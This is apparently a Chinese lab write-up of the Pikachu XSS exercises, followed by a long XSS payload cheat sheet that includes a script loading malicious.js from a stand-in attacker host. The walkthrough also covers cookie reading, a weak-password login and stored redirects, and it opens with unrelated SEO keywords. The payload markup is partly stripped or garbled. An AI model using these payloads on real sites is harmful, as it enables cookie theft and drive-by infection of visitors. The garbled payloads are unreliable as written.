淘宝店可以做团购的网站吗,无锡制作网站公司简介,wordpress外贸网站建设,搜索引擎优化包括目录
1、反射型xss(get)
2、反射性xss(post)
3、存储型xss
4、DOM型xss
5、DOM型xss-x XSS又叫跨站脚本攻击#xff0c;是HTML代码注入#xff0c;通过对网页注入浏览器可执行代码#xff0c;从而实现攻击。
1、反射型xss(get)
Which NBA player do you like? 由…目录
1、反射型xss(get)
2、反射性xss(post)
3、存储型xss
4、DOM型xss
5、DOM型xss-x XSS又叫跨站脚本攻击是HTML代码注入通过对网页注入浏览器可执行代码从而实现攻击。
1、反射型xss(get)
Which NBA player do you like? 由于提交框对输入长度有限制我们直接对请求的参数 message 进行修改 使用alert进行进行弹窗测试 构造payload
xss_reflected_get.php?messagescriptalert(1)/scriptsubmitsubmit
出现弹窗 注意如果测试内容不是数字而是字符串需要引号单引号或者双引号包裹。
比如
xss_reflected_get.php?messagescriptalert(Myon)/scriptsubmitsubmit 2、反射性xss(post)
使用很常见的弱口令
用户名admin
密码123456
登陆成功 先进行弹窗测试这里没有长度限制 读取所有可从此位置访问的cookie构造payload
scriptalert(document.cookie)/script 拿到
ant[uname]admin; ant[pw]10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSIDm8qbdmsb2npsiaktboiok0p9mo
很明显密码进行了md5加密虽然md5加密是不可逆的但是可以碰撞 关于弹窗测试的常用payload
scriptalert(/1/)/script
scriptprompt(1)/script
scriptconfirm(1)/script
alert()方法显示一条弹出提示消息和确认按钮的警告框alert()是一个阻塞的函数如果我们不点确认按钮后面的内容就不会加载出来。
prompt()方法显示提示用户进行输入的对话框这个方法返回的是用户输入的字符串。
confirm()方法显示一个含有指定消息和确认和取消按钮的确认框如果点击确定返回true否则返回false。 3、存储型xss
首先尝试获取cookie
scriptalert(document.cookie)/script 实现网页直接跳转常用payload
script typetext/javascriptwindow.location.href跳转的目的地址;/script
script typetext/javascriptwindow.location.replace(跳转的目的地址);/script
script typetext/javascriptwindow.location.assign(跳转的目的地址);/script
关于三者的区别
window.location.hreflocation.href是一个属性改变url地址
window.location.assign assign会添加记录到浏览历史 可以点击后退返回上一页面
window.location.replace 通过指定URL替换当前缓存在历史里的项目页面跳转后无法回退。
尝试将跳转页面替换为我自己博客主页地址构造payload
script typetext/javascriptwindow.location.replace(https://blog.csdn.net/Myon5?typeblog);/script 弹窗之后直接跳转到了我的CSDN个人主页面 为了更加清楚地反应储存型的特点攻击代码会长期存在于服务器
我使用手机去访问这个页面
也是出现了相同的弹窗随后跳转至我的博客主页 我们还可以将一个恶意的URL通过存储型XSS挂到页面中网页挂马只要存在未打相应补丁的用户访问了挂马页面恶意攻击者便可获取受害者的控制权限配合MSF。 4、DOM型xss
先进行弹窗测试但是没有出现弹窗回显what do you see? 点击之后发现这里直接将我们提交的内容拼接到了url后面 查看源代码 domxss 的函数从具有 id 为 text 的元素中获取输入值然后将其作为链接的 href 属性值插入到具有 id 为 dom 的元素的 innerHTML 中。
尝试它给的payload
img src# οnmοuseοveralert(xss)
通过在链接的 href 属性中闭合单引号然后插入一个图片元素该元素的 onmouseover 事件触发一个弹窗显示 xss。
当我将鼠标悬停在图片上时触发弹窗 οnclickalert(xss)
在链接的 href 属性中闭合单引号然后插入一个新的 onclick 事件该事件触发一个弹窗显示 xss。 点击该链接触发弹窗 触发的方式还有很多
1使用JavaScript事件处理器 onmouseoveralert(XSS)2使用嵌套标签
img src# onmouseoveralert(XSS)
3通过onerror事件触发
img srcx onerroralert(XSS)4、使用JavaScript伪协议点击触发
javascript:alert(1) 如果键入一个网站地址点击后则会实现页面跳转 关于a标签
a href”javascript:alert(1)”点击触发/a a hrefhttps://blog.csdn.net/Myon5?typeblog点击触发/a
其他常用标签
script标签: scriptalert(XSS)/script scriptconsole.log(XSS)/script scriptalertXSS/script
scriptalert(/1/)/script scriptprompt(1)/script scriptconfirm(1)/script script srchttp://attacker.org/malicious.js/script script srcdata:text/javascript,alert(1)/script scriptsetTimeout(alert(1),0)/script img标签: img srcinvalid οnerrοralert(XSS) img srcx οnerrοralert(XSS) img srcx οnerrοrjavascript:alert(XSS) img srcx οnerrοrprompt(1); img srcjavascript:alert(1) a标签: a hrefjavascript:alert(XSS)Click me/a a href# οnclickalert(XSS)Click me/a a hrefjavascript:void(0) οnclickalert(XSS)Click me/a iframe标签: iframe srcjavascript:alert(XSS)/iframe iframe srcdata:text/html,scriptalert(XSS)/script/iframe
iframe srcjavascript:alert(1) iframe οnlοadalert(1) svg标签: svg/οnlοadalert(XSS) svgscriptalert(XSS)/script/svg body标签: body οnlοadalert(XSS) img标签嵌入JavaScript代码: img srcx οnerrοrjavascript:alert(XSS) img srcx οnerrοralert\((1)\)
img srcx οnerrοralert(1) img srcx οnerrοrprompt(1); img srcjavascript:alert(1) input标签: input typetext value οnmοuseοveralert(XSS) input typetext valueimg srcx οnerrοralert(XSS) div标签: div οnmοuseοveralert(XSS)Hover me/div div οnmοuseοveralert(XSS)Hover me/div a标签使用DOM事件处理: a href# οnclickalert(XSS)Click me/a a hrefjavascript:void(0) οnclickalert(XSS)Click me/a
其他
video srcx οnerrοrprompt(1); audio srcx οnerrοrprompt(1);
常用事件 onclick: 点击触发 img srcx οnclickalert(1) onerror: 当 src 加载不出来时触发 img srcx οnerrοralert(1) onload: 当 src 加载完毕触发img srcx οnlοadalert(1) onmouseover鼠标指针移动到图片后触发img srcx οnmοuseοveralert(1) onmousemove: 鼠标指针移到指定的元素后触发img srcx οnmοusemοvealert(1) onfocus: 当 input 输入框获取焦点时触发input οnfοcusjavascript:alert(1) autofocus 5、DOM型xss-x
查看源码 和前面的触发方式一样
